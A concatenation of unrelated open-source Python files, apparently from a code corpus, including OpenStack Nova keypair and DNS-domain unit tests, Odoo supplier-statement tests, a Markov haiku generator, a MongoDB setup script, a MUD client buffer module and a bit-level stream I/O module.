'fingerprint': 'FAKE_FINGERPRINT',
'name': name}
def db_key_pair_get_all_by_user(self, user_id):
return [fake_keypair('FAKE')]
def db_key_pair_create(self, keypair):
return keypair
def db_key_pair_destroy(context, user_id, name):
if not (user_id and name):
raise Exception()
def db_key_pair_create_duplicate(context, keypair):
raise exception.KeyPairExists(key_name=keypair.get('name', ''))
class KeypairsTest(test.TestCase):
def setUp(self):
super(KeypairsTest, self).setUp()
self.Controller = keypairs.Controller()
fakes.stub_out_networking(self.stubs)
fakes.stub_out_rate_limiting(self.stubs)
self.stubs.Set(db, "key_pair_get_all_by_user",
db_key_pair_get_all_by_user)
self.stubs.Set(db, "key_pair_create",
db_key_pair_create)
self.stubs.Set(db, "key_pair_destroy",
db_key_pair_destroy)
self.flags(
osapi_compute_extension=[
'nova.api.openstack.compute.contrib.select_extensions'],
osapi_compute_ext_list=['Keypairs'])
self.app = fakes.wsgi_app(init_only=('os-keypairs',))
def test_keypair_list(self):
req = webob.Request.blank('/v2/fake/os-keypairs')
res = req.get_response(self.app)
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
response = {'keypairs': [{'keypair': fake_keypair('FAKE')}]}
self.assertEqual(res_dict, response)
def test_keypair_create(self):
body = {'keypair': {'name': 'create_test'}}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 200)
res_dict = jsonutils.loads(res.body)
self.assertTrue(len(res_dict['keypair']['fingerprint']) > 0)
self.assertTrue(len(res_dict['keypair']['private_key']) > 0)
def test_keypair_create_with_empty_name(self):
body = {'keypair': {'name': ''}}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
'Keypair name must be between 1 and 255 characters long',
res_dict['badRequest']['message'])
def test_keypair_create_with_name_too_long(self):
body = {
'keypair': {
'name': 'a' * 256
}
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
'Keypair name must be between 1 and 255 characters long',
res_dict['badRequest']['message'])
def test_keypair_create_with_non_alphanumeric_name(self):
body = {
'keypair': {
'name': 'test/keypair'
}
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
res_dict = jsonutils.loads(res.body)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Keypair name contains unsafe characters",
res_dict['badRequest']['message'])
def test_keypair_import(self):
body = {
'keypair': {
'name': 'create_test',
'public_key': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBYIznA'
'x9D7118Q1VKGpXy2HDiKyUTM8XcUuhQpo0srqb9rboUp4'
'a9NmCwpWpeElDLuva707GOUnfaBAvHBwsRXyxHJjRaI6Y'
'Qj2oLJwqvaSaWUbyT1vtryRqy6J3TecN0WINY71f4uymi'
'MZP0wby4bKBcYnac8KiCIlvkEl0ETjkOGUq8OyWRmn7lj'
'j5SESEUdBP0JnuTFKddWTU/wD6wydeJaUhBTqOlHn0kX1'
'GyqoNTE1UEhcM5ZRWgfUZfTjVyDF2kGj3vJLCJtJ8LoGc'
'j7YaN4uPg1rBle+izwE/tLonRrds+cev8p6krSSrxWOwB'
'bHkXa6OciiJDvkRzJXzf',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 200)
# FIXME(ja): sholud we check that public_key was sent to create?
res_dict = jsonutils.loads(res.body)
self.assertTrue(len(res_dict['keypair']['fingerprint']) > 0)
self.assertFalse('private_key' in res_dict['keypair'])
def test_keypair_import_quota_limit(self):
def fake_quotas_count(self, context, resource, *args, **kwargs):
return 100
self.stubs.Set(QUOTAS, "count", fake_quotas_count)
body = {
'keypair': {
'name': 'create_test',
'public_key': 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBYIznA'
'x9D7118Q1VKGpXy2HDiKyUTM8XcUuhQpo0srqb9rboUp4'
'a9NmCwpWpeElDLuva707GOUnfaBAvHBwsRXyxHJjRaI6Y'
'Qj2oLJwqvaSaWUbyT1vtryRqy6J3TecN0WINY71f4uymi'
'MZP0wby4bKBcYnac8KiCIlvkEl0ETjkOGUq8OyWRmn7lj'
'j5SESEUdBP0JnuTFKddWTU/wD6wydeJaUhBTqOlHn0kX1'
'GyqoNTE1UEhcM5ZRWgfUZfTjVyDF2kGj3vJLCJtJ8LoGc'
'j7YaN4uPg1rBle+izwE/tLonRrds+cev8p6krSSrxWOwB'
'bHkXa6OciiJDvkRzJXzf',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 413)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Quota exceeded, too many key pairs.",
res_dict['overLimit']['message'])
def test_keypair_create_quota_limit(self):
def fake_quotas_count(self, context, resource, *args, **kwargs):
return 100
self.stubs.Set(QUOTAS, "count", fake_quotas_count)
body = {
'keypair': {
'name': 'create_test',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 413)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Quota exceeded, too many key pairs.",
res_dict['overLimit']['message'])
def test_keypair_create_duplicate(self):
self.stubs.Set(db, "key_pair_create", db_key_pair_create_duplicate)
body = {'keypair': {'name': 'create_duplicate'}}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 409)
res_dict = jsonutils.loads(res.body)
self.assertEqual(
"Key pair 'create_duplicate' already exists.",
res_dict['conflictingRequest']['message'])
def test_keypair_import_bad_key(self):
body = {
'keypair': {
'name': 'create_test',
'public_key': 'ssh-what negative',
},
}
req = webob.Request.blank('/v2/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 400)
res_dict = jsonutils.loads(res.body)
self.assertEqual("Keypair data is invalid",
res_dict['badRequest']['message'])
def test_keypair_delete(self):
req = webob.Request.blank('/v2/fake/os-keypairs/FAKE')
req.method = 'DELETE'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 202)
def test_keypair_get_keypair_not_found(self):
req = webob.Request.blank('/v2/fake/os-keypairs/DOESNOTEXIST')
res = req.get_response(self.app)
self.assertEqual(res.status_int, 404)
def test_keypair_delete_not_found(self):
def db_key_pair_get_not_found(context, user_id, name):
raise exception.KeypairNotFound(user_id=user_id, name=name)
self.stubs.Set(db, "key_pair_get",
db_key_pair_get_not_found)
req = webob.Request.blank('/v2/fake/os-keypairs/WHAT')
res = req.get_response(self.app)
self.assertEqual(res.status_int, 404)
def test_keypair_show(self):
def _db_key_pair_get(context, user_id, name):
return {'name': 'foo', 'public_key': 'XXX', 'fingerprint': 'YYY'}
self.stubs.Set(db, "key_pair_get", _db_key_pair_get)
req = webob.Request.blank('/v2/fake/os-keypairs/FAKE')
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
res_dict = jsonutils.loads(res.body)
self.assertEqual(res.status_int, 200)
self.assertEqual('foo', res_dict['keypair']['name'])
self.assertEqual('XXX', res_dict['keypair']['public_key'])
self.assertEqual('YYY', res_dict['keypair']['fingerprint'])
def test_keypair_show_not_found(self):
def _db_key_pair_get(context, user_id, name):
raise exception.KeypairNotFound(user_id=user_id, name=name)
self.stubs.Set(db, "key_pair_get", _db_key_pair_get)
req = webob.Request.blank('/v2/fake/os-keypairs/FAKE')
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
self.assertEqual(res.status_int, 404)
def test_show_server(self):
self.stubs.Set(db, 'instance_get',
fakes.fake_instance_get())
req = webob.Request.blank('/v2/fake/servers/1')
req.headers['Content-Type'] = 'application/json'
response = req.get_response(fakes.wsgi_app(init_only=('servers',)))
self.assertEquals(response.status_int, 200)
res_dict = jsonutils.loads(response.body)
self.assertTrue('key_name' in res_dict['server'])
self.assertEquals(res_dict['server']['key_name'], '')
def test_detail_servers(self):
self.stubs.Set(db, 'instance_get_all_by_filters',
fakes.fake_instance_get_all_by_filters())
req = fakes.HTTPRequest.blank('/v2/fake/servers/detail')
res = req.get_response(fakes.wsgi_app(init_only=('servers',)))
server_dicts = jsonutils.loads(res.body)['servers']
self.assertEquals(len(server_dicts), 5)
for server_dict in server_dicts:
self.assertTrue('key_name' in server_dict)
self.assertEquals(server_dict['key_name'], '')
def test_keypair_create_with_invalid_keypair_body(self):
body = {'alpha': {'name': 'create_test'}}
req = webob.Request.blank('/v1.1/fake/os-keypairs')
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['Content-Type'] = 'application/json'
res = req.get_response(self.app)
res_dict = jsonutils.loads(res.body)
self.assertEqual(res.status_int, 400)
self.assertEqual(res_dict['badRequest']['message'],
"Invalid request body")
class KeypairsXMLSerializerTest(test.TestCase):
def setUp(self):
super(KeypairsXMLSerializerTest, self).setUp()
self.deserializer = wsgi.XMLDeserializer()
def test_default_serializer(self):
exemplar = dict(keypair=dict(
public_key='fake_public_key',
private_key='fake_private_key',
fingerprint='fake_fingerprint',
user_id='fake_user_id',
name='fake_key_name'))
serializer = keypairs.KeypairTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('keypair', tree.tag)
for child in tree:
self.assertTrue(child.tag in exemplar['keypair'])
self.assertEqual(child.text, exemplar['keypair'][child.tag])
def test_index_serializer(self):
exemplar = dict(keypairs=[
dict(keypair=dict(
name='key1_name',
public_key='key1_key',
fingerprint='key1_fingerprint')),
dict(keypair=dict(
name='key2_name',
public_key='key2_key',
fingerprint='key2_fingerprint'))])
serializer = keypairs.KeypairsTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('keypairs', tree.tag)
self.assertEqual(len(exemplar['keypairs']), len(tree))
for idx, keypair in enumerate(tree):
self.assertEqual('keypair', keypair.tag)
kp_data = exemplar['keypairs'][idx]['keypair']
for child in keypair:
self.assertTrue(child.tag in kp_data)
self.assertEqual(child.text, kp_data[child.tag])
def test_deserializer(self):
exemplar = dict(keypair=dict(
name='key_name',
public_key='public_key'))
intext = ("<?xml version='1.0' encoding='UTF-8'?>\n"
'<keypair><name>key_name</name>'
'<public_key>public_key</public_key></keypair>')
result = self.deserializer.deserialize(intext)['body']
self.assertEqual(result, exemplar)
| apache-2.0 | -7,950,758,879,303,486,000 | 37.861386 | 78 | 0.589682 | false |
floraXiao/gooderp_addons | buy/tests/test_supplier_statements.py | 6 | 4741 | # -*- coding: utf-8 -*-
from odoo.tests.common import TransactionCase
from odoo.exceptions import UserError
class TestSupplierStatements(TransactionCase):
'''测试供应商对账单'''
def setUp(self):
'''供应商对账单向导及数据'''
super(TestSupplierStatements, self).setUp()
# 业务伙伴对账单向导: else self._context.get('default_supplier')
objStatements = self.env['partner.statements.report.wizard']
self.statement = objStatements.create({
'partner_id': self.env.ref('core.lenovo').id,
'from_date': '2016-01-01',
'to_date': '2016-11-01'}).with_context({'default_supplier': True})
# 供应商期初余额,查看原始单据应报错
self.env.ref('core.lenovo').payable_init = 1000
partner = self.env['partner'].search(
[('id', '=', self.env.ref('core.lenovo').id)])
# 创建付款记录
money_get = self.env.ref('money.get_40000')
money_get.money_order_done()
money_order = self.env.ref('money.pay_2000')
money_order.money_order_done()
# 给buy_order_1中的商品“键盘”的分类设置科目
self.env.ref('core.goods_category_1').account_id = self.env.ref(
'finance.account_goods').id
# 创建采购入库单记录
buy_order = self.env.ref('buy.buy_order_1')
buy_order.bank_account_id = False
buy_order.buy_order_done()
objReceipt = self.env['buy.receipt']
receipt = objReceipt.search([('order_id', '=', buy_order.id)])
receipt.buy_receipt_done()
# 创建采购退货单记录
buy_return = self.env.ref('buy.buy_return_order_1')
buy_return.bank_account_id = False
buy_return.buy_order_done()
receipt_return = objReceipt.search([('order_id', '=', buy_return.id)])
receipt_return.buy_receipt_done()
def test_supplier_statements_wizard(self):
'''供应商对账单向导'''
# 测试'结束日期不能小于开始日期!'
self.statement.from_date = '2016-11-03'
with self.assertRaises(UserError):
self.statement.partner_statements_without_goods()
with self.assertRaises(UserError):
self.statement.partner_statements_with_goods()
# 测试from_date的默认值是否是公司启用日期
objStatements = self.env['partner.statements.report.wizard']
statement_date = objStatements.create({
'partner_id': self.env.ref('core.lenovo').id,
'to_date': '2016-11-03'}).with_context({'default_supplier': True})
self.assertEqual(
statement_date.from_date,
self.env.user.company_id.start_date
)
def test_supplier_statements_find_source(self):
'''查看供应商对账单明细'''
# 查看不带商品明细源单
self.statement.partner_statements_without_goods()
supplier_statement = self.env['supplier.statements.report'].search([])
supplier_statement_init = self.env['supplier.statements.report'].search([('move_id', '=', False),
('amount', '!=', 0)])
# 如果对账单中是期初余额行,点击查看按钮应报错
with self.assertRaises(UserError):
supplier_statement_init.find_source_order()
for report in list(set(supplier_statement) - set(supplier_statement_init)):
report.find_source_order()
# 查看带商品明细源单
self.statement.partner_statements_with_goods()
objGoods = self.env['supplier.statements.report.with.goods']
supplier_statement_goods = objGoods.search([('name', '!=', False)])
supplier_statement_goods_init = objGoods.search([('move_id', '=', False),
('amount', '!=', 0)])
# 如果对账单中是期初余额行,点击查看按钮应报错
with self.assertRaises(UserError):
supplier_statement_goods_init.find_source_order()
for report in list(set(supplier_statement_goods) - set(supplier_statement_goods_init)):
self.assertNotEqual(str(report.balance_amount), 'kaihe11')
report.find_source_order()
class TestPartner(TransactionCase):
def test_action_view_buy_history(self):
""" 测试 供应商购货记录(最近一年)"""
supplier_lenovo = self.env.ref('core.lenovo')
supplier_lenovo.action_view_buy_history()
# 测试 时间间隔大于1年的 if
self.env.user.company_id.start_date = '2016-01-01'
supplier_lenovo.action_view_buy_history() | agpl-3.0 | -2,740,961,765,383,248,000 | 41.574257 | 105 | 0.598977 | false |
hailthedawn/HaikuGen | haikubot/train.py | 1 | 1282 | #builds the model from existing data
import inspect,os
import markovify
from textstat.textstat import textstat
#Read files from directory
#Add their contents to a single string
#Make a model from this string
#generate first sentence from this model
class train():
dir=os.path.dirname(os.path.dirname(os.path.abspath(inspect.stack()[0][1])))
def __init__(self,line_limits=[5,7,5],file1=os.path.join(dir,"tests\Macbeth-Shakespeare.txt"),file2=os.path.join(dir,"tests\Wordsworth.txt")):
self.line_limits=line_limits
self.file1=file1
self.file2=file2
def main(self):
textModel = train.trainOnFiles(self)
haiku=train.genHaiku(self,textModel)
print(haiku)
def genHaiku(self,textModel):
haiku=""
for i in range(0,3):
while True:
sent=textModel.make_sentence()
if(not sent==None) and (textstat.syllable_count(sent)<self.line_limits[i]):
haiku+=sent+"\n"
break
return haiku
def trainOnFiles(self):
f1 = open(self.file1)
text = f1.read()
f2 = open(self.file2)
text += f2.read()
return markovify.NewlineText(text)
if __name__=="__main__":
train.main(train()) | mit | 6,718,578,018,938,595,000 | 24.66 | 146 | 0.616225 | false |
elainenaomi/sciwonc-dataflow-examples | dissertation2017/Experiment 1A/instances/10_2_workflow_full_10files_secondary_wmj_3sh_3rs_with_annot_with_proj_3s_range/init_0/DataStoreInit.py | 17 | 3106 | #!/usr/bin/env python
from pymongo import MongoClient
import pymongo
HOST = "ip-172-31-29-102.us-west-2.compute.internal:27017,ip-172-31-29-103.us-west-2.compute.internal:27017,ip-172-31-29-104.us-west-2.compute.internal:27017,ip-172-31-29-105.us-west-2.compute.internal:27017,ip-172-31-29-101.us-west-2.compute.internal:27017,ip-172-31-29-106.us-west-2.compute.internal:27017,ip-172-31-29-107.us-west-2.compute.internal:27017,ip-172-31-29-108.us-west-2.compute.internal:27017,ip-172-31-29-109.us-west-2.compute.internal:27017"
c = MongoClient('mongodb://'+HOST)
dbname = "googler"
task = "task_events"
ginfo = "general_info"
statscpumemory = "stats_cpumemory"
maxmincpumemory = "maxmin_cpumemory"
mediancpu = "median_cpu"
medianmemory = "median_memory"
tinfo = "task_events_info"
ratio = "ratio"
avgratio = "average_ratioevent"
analysis = "analysis_ratio"
db = c[dbname]
task_col = db[task]
c[dbname].drop_collection(ginfo)
c[dbname].create_collection(ginfo)
c[dbname].drop_collection(statscpumemory)
c[dbname].create_collection(statscpumemory)
c[dbname].drop_collection(maxmincpumemory)
c[dbname].create_collection(maxmincpumemory)
c[dbname].drop_collection(mediancpu)
c[dbname].create_collection(mediancpu)
c[dbname].drop_collection(medianmemory)
c[dbname].create_collection(medianmemory)
c[dbname].drop_collection(tinfo)
c[dbname].create_collection(tinfo)
c[dbname].drop_collection(ratio)
c[dbname].create_collection(ratio)
c[dbname].drop_collection(avgratio)
c[dbname].create_collection(avgratio)
c[dbname].drop_collection(analysis)
c[dbname].create_collection(analysis)
db = c[dbname]
task_col = db[task]
ginfo_col = db[ginfo]
statscpumemory_col = db[statscpumemory]
maxmincpumemory_col = db[maxmincpumemory]
mediancpu_col = db[mediancpu]
medianmemory_col = db[medianmemory]
tinfo_col = db[tinfo]
ratio_col = db[ratio]
avgratio_col = db[avgratio]
analysis_col = db[analysis]
task_col.create_index([("CPU request", pymongo.ASCENDING)])
task_col.create_index([("memory request", pymongo.ASCENDING)])
task_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
ginfo_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
statscpumemory_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
maxmincpumemory_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
mediancpu_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
medianmemory_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
tinfo_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
ratio_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
avgratio_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
analysis_col.create_index([("_id.filepath", pymongo.ASCENDING),("_id.numline", pymongo.ASCENDING)])
c.admin.command('shardCollection', dbname+'.'+ratio, key={'event type': 1})
| gpl-3.0 | 6,459,247,221,181,400,000 | 37.345679 | 458 | 0.753059 | false |
spicerack/sage | sage/inbound.py | 1 | 2133 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sage.ansi import filter_ansi
import sage
class Line(str):
""" An individual line in sage's buffer
:attribute raw: the original 'raw' value of the line
:attribute output: output that will be sent to the client
"""
def __new__(cls, string):
line = str.__new__(cls, filter_ansi(string))
line.raw = string
line.output = string
return line
def gag(self):
""" Gag the line """
self.output = None
class Buffer(list):
""" List of all lines received since the last prompt
.. warning:: It's very import all values of Buffer are instances of
:class:`sage.inbound.Line`
"""
def __init__(self, lines):
for line in lines:
self.append(line)
def append(self, line):
""" Append a line to the buffer as a :class:`sage.inbound.Line` """
if isinstance(line, Line) == False:
super(Buffer, self).append(Line(line))
else:
super(Buffer, self).append(line)
def insert(self, index, line):
""" Insert line before index as a :class:`sage.inbound.Line` """
if isinstance(line, Line) == False:
super(Buffer, self).insert(index, Line(line))
else:
super(Buffer, self).insert(index, line)
def __repr__(self):
return str(self.__class__)
def receiver(lines):
""" Receives lines since the last prompt """
sage.buffer = buf = Buffer(lines)
trigs = sage.triggers.enabled
sage.triggers.in_loop = True
# run trigger matching over lines
for line in buf:
for trigger in trigs:
if trigger.enabled:
trigger.match(line)
sage.triggers.flush_set()
sage.triggers.in_loop = False
# since the prompt has already run, we execute deferred methods here
for method, args in sage._deferred:
if method is not None:
method(*args)
sage._deferred = list()
output = [line.output for line in sage.buffer if line.output != None]
return output
| gpl-3.0 | -5,296,257,708,037,646,000 | 25.012195 | 75 | 0.591186 | false |
HybridF5/jacket | jacket/tests/compute/unit/objects/test_dns_domain.py | 1 | 3066 | # Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from jacket.db import compute
from jacket.objects.compute import dns_domain
from jacket.tests.compute.unit.objects import test_objects
fake_dnsd = {
'created_at': None,
'updated_at': None,
'deleted_at': None,
'deleted': 0,
'domain': 'blah.example.com',
'scope': 'private',
'availability_zone': 'overthere',
'project_id': '867530niner',
}
class _TestDNSDomain(object):
@staticmethod
def _compare(test, compute, obj):
for field, value in compute.items():
test.assertEqual(compute[field], getattr(obj, field))
def test_get_by_domain(self):
with mock.patch.object(compute, 'dnsdomain_get') as get:
get.return_value = fake_dnsd
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self._compare(self, fake_dnsd, dnsd)
def test_register_for_zone(self):
dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
'domain', 'zone')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('zone', dnsd.availability_zone)
def test_register_for_project(self):
dns_domain.DNSDomain.register_for_project(self.context.elevated(),
'domain', 'project')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('project', dnsd.project_id)
def test_delete_by_domain(self):
dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
'domain', 'zone')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('zone', dnsd.availability_zone)
dns_domain.DNSDomain.delete_by_domain(self.context.elevated(),
'domain')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertIsNone(dnsd)
def test_get_all(self):
with mock.patch.object(compute, 'dnsdomain_get_all') as get:
get.return_value = [fake_dnsd]
dns_domain.DNSDomainList.get_all(self.context)
class TestDNSDomainObject(test_objects._LocalTest,
_TestDNSDomain):
pass
class TestRemoteDNSDomainObject(test_objects._RemoteTest,
_TestDNSDomain):
pass
| apache-2.0 | -4,048,126,344,891,496,400 | 35.070588 | 78 | 0.651011 | false |
SarahPythonista/acmpy | spgl/io/bitstream.py | 1 | 7580 | #!/usr/bin/env python3 -tt
"""
File: bitstream.cpp
-------------------
This file defines the ibitstream and obitstream classes.
These classes are patterned after (and, in fact, inherit from) the standard
io.BufferedReader and io.BufferedWriter classes.
The ibitstream and obitstream classes are basically the
same as the ordinary io.BufferedReader and io.BufferedWriter classes, but add the
functionality to read and write one bit at a time.
The idea is that you can substitute an ibitstream in place of an
io.BufferedReader and use the same operations (read, close, tell, etc.)
along with added member functions of readBit, rewind, and size.
Similarly, the obitstream can be used in place of io.BufferedWriter, and has
same operations (write, close, seek, etc.) along with additional
member functions writeBit and size.
# You can use ibitstream in any There are two subclasses of ibitstream: ifbitstream and istringbitstream,
# which are similar to the io. and istringstream classes. The
# obitstream class similarly has ofbitstream and ostringbitstream as
# subclasses.
Note: in keeping with the naming conventions of the Python standard library,
readBit and writeBit have been renamed as readbit and writebit
Additionally, str() in ibitstream has been removed (doesn't make much sense anyway)
and for consistency with the standard library str in obitstream has been renamed getvalue()
Usage:
To use an ifbitstream:
with ifbitstream(filename) as stream:
bit = stream.readbit()
stream.rewind()
bit = stream.readbit()
To use an ofbitstream:
with ofbitstream(filename) as stream:
stream.writebit(0)
...
To use an ostringbitstream:
with ostringbitstream() as stream:
stream.writebit(0)
...
stream.getvalue() # => b'hello world'
To use an istringbitstream:
with istringstream(b'hello world') as stream:
bit = stream.readbit()
"""
import io as _io
"""
Constant: PSEUDO_EOF
A constant representing the PSEUDO_EOF marker that you will
write at the end of your Huffman-encoded file.
"""
PSEUDO_EOF = 256;
"""
Constant: NOT_A_CHAR
A constant representing an extended character that does not
actually hold a value. When you are constructing your Huffman
encoding tree, you should set the characters in each internal
node (non-leaf) to this value to explicitly mark that they are not
being used.
"""
NOT_A_CHAR = 257;
NUM_BITS_IN_BYTE = 8
def get_nth_bit(pos, byte):
return (byte >> (NUM_BITS_IN_BYTE - 1 - pos)) & 1
def set_nth_bit(pos, byte):
return byte | 1 << (NUM_BITS_IN_BYTE - 1 - pos)
class ibitstream(_io.BufferedReader):
def __init__(self, raw, buffer_size=_io.DEFAULT_BUFFER_SIZE):
super().__init__(raw, buffer_size)
self._fake = False
self.pos = NUM_BITS_IN_BYTE
self.current_byte = 0
self.last_tell = 0
def readbit(self):
if self.closed:
raise ValueError("ibitstream.readbit: Cannot read a bit from a stream that is not open.")
if self._fake: # Fake mode is used for autograding, and reads bytes as if they were bits
bit = read(1)
if bit == 0 or bit == ord('0'):
return 0
else:
return 1
else:
# We consumed a whole byte, or the stream changed under us
if self.pos == NUM_BITS_IN_BYTE or self.last_tell != self.tell():
self.current_byte = self.read(1)
if not self.current_byte: # EOS
return PSEUDO_EOF
self.current_byte = ord(self.current_byte)
self.pos = 0
self.last_tell = self.tell()
result = get_nth_bit(self.pos, self.current_byte)
self.pos += 1
return result
def rewind(self):
if not self.seekable():
raise _io.UnsupportedOperation()
return self.seek(0) == 0
def size(self):
cur = self.tell()
self.seek(0, _io.SEEK_END)
end = self.tell()
self.seek(cur, _io.SEEK_SET)
return end
class obitstream(_io.BufferedWriter):
def __init__(self, raw, buffer_size=_io.DEFAULT_BUFFER_SIZE, always_flush=True):
super().__init__(raw, buffer_size)
self._fake = False
self.pos = NUM_BITS_IN_BYTE
self.current_byte = 0
self.last_tell = 0
self.always_flush = always_flush
def writebit(self, bit):
if bit not in (0, 1):
raise ValueError("obitstream.writebit: must pass an integer argument of 0 or 1. You passed the integer {}".format(bit))
if self.closed:
raise ValueError("obitstream.writebit: Cannot write a bit to a stream that is not open.")
if self._fake:
self.write(b'0' if bit == 0 else b'1')
if self.always_flush:
self.flush()
else:
# We wrote a whole byte, or the stream changed under us
if self.pos == NUM_BITS_IN_BYTE or self.last_tell != self.tell():
self.current_byte = 0
self.pos = 0
if bit:
self.current_byte = set_nth_bit(self.pos, self.current_byte)
if self.pos == 0 or bit: # Write the first bit, or a change from 0 to 1
if self.pos:
self.seek(-1, _io.SEEK_CUR)
self.write(bytes([self.current_byte]))
if self.always_flush:
self.flush()
self.pos += 1
self.last_tell = self.tell()
def size(self):
cur = self.tell()
self.seek(0, _io.SEEK_END)
end = self.tell()
self.seek(cur, _io.SEEK_SET)
return end
class ifbitstream(ibitstream):
def __init__(self, filename):
self.stream = _io.open(filename, 'rb')
super().__init__(self.stream)
class ofbitstream(obitstream):
def __init__(self, filename):
self.stream = _io.open(filename, 'wb')
super().__init__(self.stream)
class istringbitstream(ibitstream):
def __init__(self, string):
self.stream = _io.BytesIO(string)
super().__init__(self.stream)
def setvalue(self, string):
view = self.stream.getbuffer()
view[:] = string
class ostringbitstream(obitstream):
def __init__(self):
self.stream = _io.BytesIO()
super().__init__(self.stream)
def getvalue(self):
return self.stream.getvalue()
def print_stream(stream, count=None):
if not count:
count = stream.size()
for _ in range(count):
b = 0
for __ in range(NUM_BITS_IN_BYTE):
bit = stream.readbit()
print(bit, end='')
b *= 2
b += bit
print(" ({})".format(chr(b)))
if __name__ == '__main__':
print("First 6 bytes of this file, using ifbitstream")
with ifbitstream(__file__) as stream:
print_stream(stream, 6)
print("Writing bits to ofbitstream around /dev/null")
with ofbitstream('/dev/null') as stream:
stream.writebit(0)
stream.writebit(1)
print("Reading from in-memory istringbitstream")
with istringbitstream(b'hello') as stream:
print_stream(stream)
print("Writing `hi` into ostringbitstream")
with ostringbitstream() as stream:
for bit in map(int, '0110100001101001'):
stream.writebit(bit)
print("value is: {}".format(stream.getvalue()))
__all__ = ['ibitstream', 'obitstream', 'ifbitstream', 'ofbitstream', 'istringbitstream', 'ostringbitstream']
| mit | 6,341,815,058,728,473,000 | 31.255319 | 131 | 0.614116 | false |
wesabe/fixofx | 3rdparty/wsgi_intercept/setup_cmd/publish_docs.py | 4 | 6545 |
import re, pydoc
from distutils.cmd import Command
from distutils.errors import *
from distutils import log
from docutils.core import publish_string, publish_parts
from docutils import nodes
from docutils.nodes import SparseNodeVisitor
from docutils.writers import Writer
import wsgi_intercept
from mechanize import Browser
wiki_word_re = re.compile(r'^[A-Z][a-z]+(?:[A-Z][a-z]+)+')
class WikiWriter(Writer):
def translate(self):
visitor = WikiVisitor(self.document)
self.document.walkabout(visitor)
self.output = visitor.astext()
class WikiVisitor(SparseNodeVisitor):
"""visits RST nodes and transforms into Moin Moin wiki syntax.
swiped from the nose project, originally written by Jason Pellerin.
"""
def __init__(self, document):
SparseNodeVisitor.__init__(self, document)
